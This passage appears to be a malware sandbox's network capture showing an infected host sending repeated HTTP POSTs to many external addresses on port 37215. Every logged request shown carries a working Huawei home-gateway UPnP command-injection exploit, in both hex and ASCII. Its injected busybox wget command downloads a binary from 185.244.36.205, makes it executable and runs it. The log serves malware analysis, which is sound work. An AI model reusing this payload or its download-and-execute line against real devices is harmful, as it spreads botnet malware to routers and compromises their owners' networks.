                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              859192.168.2.153843245.163.7.7137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538326025 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              860192.168.2.1549846222.184.17.15837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538348913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              861192.168.2.155598631.159.73.937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538369894 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              862192.168.2.1553442122.165.81.19637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538372993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              863192.168.2.1543266222.60.200.8737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538409948 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              864192.168.2.154583245.222.198.23337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538414001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              865192.168.2.1545828187.195.251.23937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538451910 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              866192.168.2.1551364222.131.157.4837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538471937 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              867192.168.2.1560300222.186.209.11437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538481951 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              868192.168.2.155918837.221.48.5137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538486004 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              869192.168.2.154506894.253.135.13037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538506031 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
